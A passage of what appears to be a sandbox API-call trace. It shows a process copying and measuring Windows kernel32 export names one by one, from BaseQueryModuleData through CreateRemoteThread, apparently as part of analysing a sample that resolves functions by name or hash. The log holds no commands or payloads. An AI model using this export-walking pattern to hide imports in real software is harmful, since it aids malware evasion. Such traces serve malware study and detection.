returned="BaseQueryModuleData" [0182.314] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.314] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.314] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.314] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.314] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.314] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.314] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.315] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.315] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.315] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.315] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.315] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.315] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.315] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.315] lstrlenA (lpString="BEEP") returned 4 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.315] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.315] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.315] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.315] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.315] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.315] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.315] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.315] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.315] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.315] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.316] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.316] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.316] lstrlenA (lpString="CANCELIO") returned 8 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.316] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.316] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.316] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.316] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.316] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.316] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.316] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.316] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.316] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.316] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.316] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.316] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.316] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.316] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.316] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.316] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.317] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.317] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.317] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.317] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.317] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.317] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.317] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.317] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.317] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.317] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.317] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.317] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.317] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.317] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.318] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.318] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.318] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.318] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.318] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.318] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.318] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.318] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.318] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.318] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.318] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.318] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.318] lstrlenA (lpString="COPYFILEA") returned 9 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.318] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.318] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.318] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.318] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.318] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.319] lstrlenA (lpString="COPYFILEW") returned 9 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.319] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.319] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.319] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.319] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.319] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.319] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.319] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.319] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.319] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.319] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.319] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.319] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.319] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.319] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.319] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.319] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.319] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.319] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.320] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.320] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.320] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.320] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.320] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.320] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.320] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.320] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.320] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.320] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.320] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.320] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.320] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.320] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.320] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.320] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.320] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.320] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.321] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.321] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.321] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.321] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.321] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.321] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.321] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.321] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.321] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.321] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.321] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.321] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.321] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.321] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.321] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.321] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.321] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.321] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.322] lstrlenA (lpString="CREATEREMOTETHREAD") 